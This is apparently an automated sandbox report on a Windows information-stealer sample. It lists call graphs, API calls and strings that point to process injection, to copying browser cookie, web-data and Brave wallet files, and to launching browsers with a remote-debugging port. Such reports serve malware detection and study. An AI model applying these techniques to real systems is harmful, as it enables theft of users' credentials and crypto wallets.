76898->76899 76900 6c9ab8de 76898->76900 76899->76897 76901 6c9ab8fd dllmain_crt_dispatch 76899->76901 76909 6c98bed0 DisableThreadLibraryCalls LoadLibraryExW 76900->76909 76901->76897 76901->76900 76903 6c9ab91e 76904 6c9ab94a 76903->76904 76910 6c98bed0 DisableThreadLibraryCalls LoadLibraryExW 76903->76910 76904->76897 76905 6c9ab953 dllmain_crt_dispatch 76904->76905 76905->76897 76907 6c9ab966 dllmain_raw 76905->76907 76907->76897 76908 6c9ab936 dllmain_crt_dispatch dllmain_raw 76908->76904 76909->76903 76910->76908 76911 6c973060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 76916 6c9aab2a 76911->76916 76915 6c9730db 76920 6c9aae0c _crt_atexit _register_onexit_function 76916->76920 76918 6c9730cd 76919 6c9ab320 5 API calls ___raise_securityfailure 76918->76919 76919->76915 76920->76918 76921 6c9735a0 76922 6c9735c4 InitializeCriticalSectionAndSpinCount getenv 76921->76922 76937 6c973846 __aulldiv 76921->76937 76923 6c9738fc strcmp 76922->76923 76928 6c9735f3 __aulldiv 76922->76928 76925 6c973912 strcmp 76923->76925 76923->76928 76925->76928 76926 6c9735f8 QueryPerformanceFrequency 76926->76928 76927 6c9738f4 76928->76926 76929 6c973622 _strnicmp 76928->76929 76930 6c97375c 76928->76930 76932 6c973944 _strnicmp 76928->76932 76934 6c97395d 76928->76934 76935 6c973664 GetSystemTimeAdjustment 76928->76935 76929->76928 76929->76932 76931 6c97376a QueryPerformanceCounter EnterCriticalSection 76930->76931 76933 6c9737b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 76930->76933 76936 6c9737fc LeaveCriticalSection 76930->76936 76930->76937 76931->76930 76931->76933 76932->76928 76932->76934 76933->76930 76933->76936 76935->76928 76936->76930 76936->76937 76938 6c9ab320 5 API calls ___raise_securityfailure 76937->76938 76938->76927 76939 6c98c930 GetSystemInfo VirtualAlloc 76940 6c98c9a3 GetSystemInfo 76939->76940 76941 6c98c973 76939->76941 76942 6c98c9d0 76940->76942 76943 6c98c9b6 76940->76943 76955 6c9ab320 5 API calls ___raise_securityfailure 76941->76955 76942->76941 76947 6c98c9d8 VirtualAlloc 76942->76947 76943->76942 76946 6c98c9bd 76943->76946 76945 6c98c99b 76946->76941 76948 6c98c9c1 VirtualFree 76946->76948 76949 6c98c9ec 76947->76949 76950 6c98c9f0 76947->76950 76948->76941 76949->76941 76956 6c9acbe8 GetCurrentProcess TerminateProcess 76950->76956 76955->76945 76957 6c9ab830 76958 6c9ab83b 76957->76958 76959 6c9ab86e dllmain_crt_process_detach 76957->76959 76960 6c9ab860 dllmain_crt_process_attach 76958->76960 76961 6c9ab840 76958->76961 76959->76961 76960->76961 76962 6c9ab9c0 76963 6c9ab9c9 76962->76963 76964 6c9ab9ce dllmain_dispatch 76962->76964 76966 6c9abef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 76963->76966 76966->76964 76967 6c9ab694 76968 6c9ab6a0 ___scrt_is_nonwritable_in_current_image 76967->76968 76997 6c9aaf2a 76968->76997 76970 6c9ab6a7 76971 6c9ab6d1 76970->76971 76972 6c9ab796 76970->76972 76975 6c9ab6ac ___scrt_is_nonwritable_in_current_image 76970->76975 77001 6c9ab064 76971->77001 77014 6c9ab1f7 IsProcessorFeaturePresent 76972->77014 76976 6c9ab6e0 __RTC_Initialize 76976->76975 77004 6c9abf89 InitializeSListHead 76976->77004 76978 6c9ab6ee ___scrt_initialize_default_local_stdio_options 76980 6c9ab6f3 _initterm_e 76978->76980 76979 6c9ab79d ___scrt_is_nonwritable_in_current_image 76981 6c9ab828 76979->76981 76982 6c9ab7d2 76979->76982 76996 6c9ab7b3 ___scrt_uninitialize_crt __RTC_Initialize 76979->76996 76980->76975 76984 6c9ab708 76980->76984 76983 6c9ab1f7 ___scrt_fastfail 6 API calls 76981->76983 77018 6c9ab09d _execute_onexit_table _cexit ___scrt_release_startup_lock 76982->77018 76986 6c9ab82f 76983->76986 77005 6c9ab072 76984->77005 76992 6c9ab83b 76986->76992 76993 6c9ab86e dllmain_crt_process_detach 76986->76993 76988 6c9ab7d7 77019 6c9abf95 __std_type_info_destroy_list 76988->77019 76989 6c9ab70d 76989->76975 76991 6c9ab711 _initterm 76989->76991 76991->76975 76994 6c9ab860 dllmain_crt_process_attach 76992->76994 76995 6c9ab840 76992->76995 76993->76995 76994->76995 76998 6c9aaf33 76997->76998 77020 6c9ab341 IsProcessorFeaturePresent 76998->77020 77000 6c9aaf3f ___scrt_uninitialize_crt 77000->76970 77021 6c9aaf8b 77001->77021 77003 6c9ab06b 77003->76976 77004->76978 77006 6c9ab077 ___scrt_release_startup_lock 77005->77006 77007 6c9ab07b 77006->77007 77008 6c9ab082 77006->77008 77031 6c9ab341 IsProcessorFeaturePresent 77007->77031 77011 6c9ab087 _configure_narrow_argv 77008->77011 77010 6c9ab080 77010->76989 77012 6c9ab092 77011->77012 77013 6c9ab095 _initialize_narrow_environment 77011->77013 77012->76989 77013->77010 77015 6c9ab20c ___scrt_fastfail 77014->77015 77016 6c9ab218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 77015->77016 77017 6c9ab302 ___scrt_fastfail 77016->77017 77017->76979 77018->76988 77019->76996 77020->77000 77022 6c9aaf9a 77021->77022 77023 6c9aaf9e 77021->77023 77022->77003 77024 6c9ab028 77023->77024 77027 6c9aafab ___scrt_release_startup_lock 77023->77027 77025 6c9ab1f7 ___scrt_fastfail 6 API calls 77024->77025 77026 6c9ab02f 77025->77026 77028 6c9aafb8 _initialize_onexit_table 77027->77028 77029 6c9aafd6 77027->77029 77028->77029 77030 6c9aafc7 _initialize_onexit_table 77028->77030 77029->77003 77030->77029 77031->77010

                                                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                                                    Function 008FA132 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                                    • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 2238633743-2740034357
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9c6d769fa6747e86939cbf30bf1462a83ae3472cbe0625df74570c83607336b7
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9f6123220b008396b82a6d1c896535e3484862a44d04d63235ae1c00d1b483bb
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c6d769fa6747e86939cbf30bf1462a83ae3472cbe0625df74570c83607336b7
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D52E279901211FFDB2A9FA4EE0AD653BB6F7183463404625EA55E3230DF329863EF11
                                                                                                                                                                                                                                                                                                                    Function 008EA941 Relevance: 67.3, APIs: 29, Strings: 9, Instructions: 780filestringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 451 8ea941-8eaa01 call 8f2143 call 8f2223 call 8f2265 call 8f21e9 call 8e2910 * 2 call 8f2143 * 2 FindFirstFileA 468 8eaa07-8eaa1b StrCmpCA 451->468 469 8eb6c1-8eb720 call 8e2910 * 3 call 8e1cce call 8e2910 * 5 call 8fe88c 451->469 470 8eb69a-8eb6af FindNextFileA 468->470 471 8eaa21-8eaa35 StrCmpCA 468->471 470->468 473 8eb6b5-8eb6bb FindClose 470->473 471->470 474 8eaa3b-8eaab1 call 8f21a5 call 8f2223 call 8f2265 * 2 call 8f21e9 call 8e2910 * 3 471->474 473->469 508 8eabba-8eac2e call 8f2265 * 4 call 8f21e9 call 8e2910 * 3 474->508 509 8eaab7-8eaacd StrCmpCA 474->509 562 8eac34-8eac49 call 8e2910 StrCmpCA 508->562 511 8eaacf-8eab3f call 8f2265 * 4 call 8f21e9 call 8e2910 * 3 509->511 512 8eab44-8eabb8 call 8f2265 * 4 call 8f21e9 call 8e2910 * 3 509->512 511->562 512->562 565 8eac4f-8eac63 StrCmpCA 562->565 566 8eae1b-8eae30 StrCmpCA 562->566 565->566 567 8eac69-8ead9f call 8f2143 call 8f38a6 call 8f2265 call 8f2223 call 8f2265 call 8f2223 call 8f21e9 call 8e2910 * 5 CopyFileA call 8f2143 call 8f2265 * 2 call 8f21e9 call 8e2910 * 2 call 8f2175 call 8e9148 565->567 568 8eae85-8eae9a StrCmpCA 566->568 569 8eae32-8eae75 call 8e1ced call 8f2175 * 3 call 8e9777 566->569 828 8eade4-8eae16 DeleteFileA call 8e2910 * 3 567->828 829 8eada1-8eaddf call 8e1ced call 8f2175 call 8f8be6 call 8e2910 567->829 571 8eb0ae-8eb0c8 call 8f2175 call 8f39ee 568->571 572 8eaea0-8eaeb1 StrCmpCA 568->572 636 8eae7a-8eae80 569->636 599 8eb0ce-8eb0d6 571->599 600 8eb2c6-8eb2db StrCmpCA 571->600 575 8eb5ef-8eb5f6 572->575 576 8eaeb7-8eaebf 572->576 580 8eb66a-8eb694 call 8e2910 * 2 575->580 581 8eb5f8-8eb65f call 8e1ced call 8f2175 * 4 call 8f2143 call 8ea941 575->581 576->575 583 8eaec5-8eaec8 576->583 580->470 682 8eb664 581->682 589 8eaece-8eaed4 583->589 590 8eb032-8eb0a9 call 905490 lstrcat * 3 call 8e1ced 583->590 589->470 596 8eaeda-8eaf7e call 8f2143 call 8f38a6 call 8f2265 call 8f2223 call 8f2265 call 8f2223 call 8f21e9 call 8e2910 * 5 589->596 633 8eb2b3-8eb2b9 call 8e8dea 590->633 748 8eaf93-8eafae CopyFileA 596->748 599->575 608 8eb0dc-8eb0df 599->608 614 8eb462-8eb477 StrCmpCA 600->614 615 8eb2e1-8eb3bb call 8f2143 call 8f38a6 call 8f2265 call 8f2223 call 8f2265 call 8f2223 call 8f21e9 call 8e2910 * 5 CopyFileA call 8f2175 call 8e9148 600->615 617 8eb244-8eb2b2 call 905490 lstrcat * 3 call 8e1ced 608->617 618 8eb0e5-8eb0eb 608->618 614->575 623 8eb47d-8eb53c call 8f2143 call 8f38a6 call 8f2265 call 8f2223 call 8f2265 call 8f2223 call 8f21e9 call 8e2910 * 5 CopyFileA 614->623 792 8eb3bd-8eb40f call 8e1ced call 8f2265 call 8f2223 call 8f2265 call 8f8be6 615->792 793 8eb438-8eb44a DeleteFileA call 8e2910 615->793 617->633 618->470 629 8eb0f1-8eb195 call 8f2143 call 8f38a6 call 8f2265 call 8f2223 call 8f2265 call 8f2223 call 8f21e9 call 8e2910 * 5 618->629 767 8eb542-8eb5bd call 8e1ced call 8f2175 * 3 call 8e9c95 call 8e1ced call 8f2175 * 3 call 8e9eca 623->767 768 8eb5c3-8eb5d5 DeleteFileA call 8e2910 623->768 778 8eb1aa-8eb1c5 CopyFileA 629->778 649 8eb2be-8eb2c1 633->649 636->575 649->575 682->580 756 8eaf80-8eaf90 call 8f2175 call 8f40f6 748->756 757 8eafb0-8eafd1 call 8f2175 call 8e9148 748->757 756->748 794 8eb022-8eb02d call 8e2910 757->794 795 8eafd3-8eb018 call 8e1ced call 8f2265 call 8f8be6 call 8e2910 757->795 767->768 786 8eb5da-8eb5e1 768->786 780 8eb197-8eb1a7 call 8f2175 call 8f40f6 778->780 781 8eb1c7-8eb1e8 call 8f2175 call 8e9148 778->781 780->778 821 8eb1ea-8eb22f call 8e1ced call 8f2265 call 8f8be6 call 8e2910 781->821 822 8eb239 781->822 788 8eb5e8-8eb5ea call 8e2910 786->788 788->575 856 8eb414-8eb433 call 8e2910 * 3 792->856 811 8eb44f-8eb45d 793->811 794->470 795->794 811->788 821->822 822->617 828->566 829->828 856->793
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,0091786B,0091786A,00918464,00917867,?,?,?), ref: 008EA9EB
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00918468), ref: 008EAA13
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0091846C), ref: 008EAA2D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21A5: lstrlen.KERNEL32(?,?,008F9098,009177FE,00917787,?,?,?,?,008F9D6E), ref: 008F21AB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21A5: lstrcpy.KERNEL32(00000000,00000000), ref: 008F21DD
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera GX,00918470,?,0091786E), ref: 008EAABF
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Brave,00918490,00918494,00918470,?,0091786E), ref: 008EAC41
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Preferences), ref: 008EAC5B
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008EAD1B
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008EADEA
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 008EAE28
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 008EAE92
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(008EDCCC), ref: 008EAEA9
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008EAFA1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F40F6: _memset.LIBCMT ref: 008F411D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F40F6: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 008F41C3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F40F6: TerminateProcess.KERNEL32(00000000,00000000), ref: 008F41D1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F40F6: CloseHandle.KERNEL32(00000000), ref: 008F41D8
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008EB03F
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008EB051
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008EB061
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008EB251
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008EB263
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 008EB273
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 008EB285
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 008EB2D3
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008EB393
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E9163
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,008EF752,?,?,?), ref: 008E917A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,008EF752,?,?,?), ref: 008E9191
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E91A8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CloseHandle.KERNEL32(?,?,?,?,?,008EF752,?,?,?), ref: 008E91D0
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008EB43E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 008EB46F
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 008EB073
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F38A6: GetSystemTime.KERNEL32(?,00917807,?), ref: 008F38D5
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008EB1B8
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008EB52F
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008EB5C9
                                                                                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 008EB6A7
                                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 008EB6BB
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: File$lstrcat$lstrcpy$Copy$CloseDeleteFind_memset$CreateHandleProcesslstrlen$AllocFirstLocalNextObjectOpenReadSingleSizeSystemTerminateThreadTimeWait
                                                                                                                                                                                                                                                                                                                    • String ID: --remote-debugging-port=9223 --profile-directory="$ --remote-debugging-port=9223 --profile-directory="$Brave$Opera GX$Preferences$\BraveWallet\Preferences$_cookies.db$_cookies.db$_webdata.db
                                                                                                                                                                                                                                                                                                                    • API String ID: 1219303437-2271920603
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9d2b288c9edf630cca9724c827aa0ef6495594cec6abe350fa38aa9376070f2b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ef48621bfdeb0bb765f54587c1f56a56d748845959df2998694fa7c727773781
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d2b288c9edf630cca9724c827aa0ef6495594cec6abe350fa38aa9376070f2b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4072E53190026D9BCB21FB69DD46ADDB778FF05305F4105A1BA08F3162DA71AF998F82
                                                                                                                                                                                                                                                                                                                    Function 008E7FAB Relevance: 60.2, APIs: 28, Strings: 6, Instructions: 715networkCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 875 8e7fab-8e8084 call 90fc10 call 8f02aa * 2 call 8f0532 call 8f0090 call 8f045e 888 8e808a-8e80b1 call 8f02cd 875->888 889 8e8ac0 875->889 894 8e80b3-8e80df call 8f0532 888->894 895 8e80e1-8e813d call 8f012d call 8f0151 call 8f045e call 8f0532 888->895 891 8e8ac5-8e8acb call 8eff15 889->891 896 8e8ad0 891->896 903 8e8143-8e8180 call 8f0151 call 8f045e call 8f02cd 894->903 895->903 899 8e8ad2-8e8b0d call 8f045e * 3 call 8fe88c 896->899 923 8e8186-8e8210 call 8f0532 call 8f0151 call 8f045e call 8f0532 call 8f0151 call 8f045e 903->923 924 8e8215-8e8222 903->924 923->924 925 8e822a-8e8249 call 8f3759 WSAStartup 924->925 926 8e8224 924->926 932 8e824b-8e8250 925->932 933 8e8255-8e826c socket 925->933 926->925 932->891 935 8e827e-8e82b5 933->935 936 8e826e-8e8279 WSACleanup 933->936 938 8e82bd-8e82d5 getaddrinfo 935->938 939 8e82b7 935->939 936->891 941 8e82ff-8e8356 htons FreeAddrInfoW connect 938->941 942 8e82d7-8e82fa closesocket WSACleanup call 8eff15 938->942 939->938 944 8e8358-8e836f closesocket WSACleanup 941->944 945 8e8374-8e850e call 8f02aa call 8f0814 call 8f022b call 8f0151 call 8f086b call 8f022b call 8f0151 call 8f086b call 8f022b call 8f0151 call 8f086b call 8f022b call 8f0151 call 8f045e * 7 941->945 942->899 944->891 992 8e8516-8e8530 send 945->992 993 8e8510 945->993 994 8e8532-8e853f closesocket WSACleanup 992->994 995 8e8570-8e8586 recv 992->995 993->992 998 8e8544-8e856b call 8eff15 call 8f045e * 2 994->998 996 8e859c-8e85cf call 8f02aa rand 995->996 997 8e8588-8e859a closesocket WSACleanup 995->997 1004 8e85d8-8e85e5 rand 996->1004 1005 8e85d1-8e85d7 996->1005 997->998 998->896 1007 8e85ee-8e85fb rand 1004->1007 1008 8e85e7-8e85ed 1004->1008 1005->1004 1010 8e85fd-8e8603 1007->1010 1011 8e8604-8e8611 rand 1007->1011 1008->1007 1010->1011 1012 8e861a-8e8648 call 8f0250 1011->1012 1013 8e8613-8e8619 1011->1013 1017 8e864a-8e8656 1012->1017 1018 8e8658-8e8664 1012->1018 1013->1012 1019 8e8679-8e8684 call 8f0250 1017->1019 1020 8e8686-8e8695 call 8f0250 1018->1020 1021 8e8666-8e8678 call 8f0250 * 2 1018->1021 1030 8e86b9-8e86d2 call 8eff70 1019->1030 1028 8e8696-8e86b7 call 910a00 call 8f0250 1020->1028 1021->1019 1028->1030 1037 8e870c-8e8719 1030->1037 1038 8e86d4-8e86e1 1030->1038 1042 8e871b 1037->1042 1043 8e8721-8e873a send 1037->1043 1040 8e86e9-8e870a call 8f0250 1038->1040 1041 8e86e3 1038->1041 1040->1037 1040->1038 1041->1040 1042->1043 1044 8e877f-8e87a8 1043->1044 1045 8e873c-8e877a closesocket WSACleanup call 8eff15 call 8f045e * 2 1043->1045 1048 8e87af-8e87ca recv 1044->1048 1045->1044 1051 8e89d7-8e8a10 call 8f0250 * 2 1048->1051 1052 8e87d0-8e87f6 call 8f09d0 1048->1052 1066 8e8a14-8e8a49 send closesocket WSACleanup 1051->1066 1067 8e8a12 1051->1067 1061 8e899d-8e89b4 1052->1061 1064 8e89ba 1061->1064 1065 8e87fb-8e882c 1061->1065 1068 8e89c8-8e89d1 1064->1068 1069 8e885e-8e8861 1065->1069 1070 8e882e-8e8830 1065->1070 1074 8e8a4b 1066->1074 1075 8e8a51-8e8a5e 1066->1075 1067->1066 1068->1048 1068->1051 1072 8e88b4-8e88c0 1069->1072 1073 8e8863-8e8865 1069->1073 1070->1069 1071 8e8832-8e8839 1070->1071 1071->1068 1076 8e883f-8e885c 1071->1076 1080 8e88dc-8e88f0 1072->1080 1081 8e88c2-8e88cb 1072->1081 1073->1072 1077 8e8867-8e886e 1073->1077 1074->1075 1078 8e8a66-8e8abb call 8f08de call 8f0151 call 8f045e * 3 call 8f04d8 1075->1078 1079 8e8a60 1075->1079 1076->1072 1077->1068 1082 8e8874-8e887a 1077->1082 1078->889 1079->1078 1080->1068 1085 8e88f6 1080->1085 1081->1068 1084 8e88d1-8e88da 1081->1084 1086 8e8880-8e88ac 1082->1086 1084->1080 1088 8e88f8-8e88fe 1085->1088 1089 8e8904-8e8929 call 8f08a7 1085->1089 1086->1086 1090 8e88ae 1086->1090 1088->1068 1088->1089 1095 8e892b-8e893b 1089->1095 1096 8e8955-8e8968 call 8f0b24 1089->1096 1090->1072 1095->1096 1098 8e893d-8e8953 1095->1098 1102 8e896d-8e8996 call 8f00e9 1096->1102 1098->1096 1098->1098 1108 8e89bc-8e89c3 call 8f04d8 1102->1108 1109 8e8998 call 8f04d8 1102->1109 1108->1068 1109->1061
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F0532: std::_Xinvalid_argument.LIBCPMT ref: 008F054B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F045E: _memmove.LIBCMT ref: 008F0478
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F02CD: memchr.MSVCRT ref: 008F0336
                                                                                                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 008E8241
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F0532: _memmove.LIBCMT ref: 008F059D
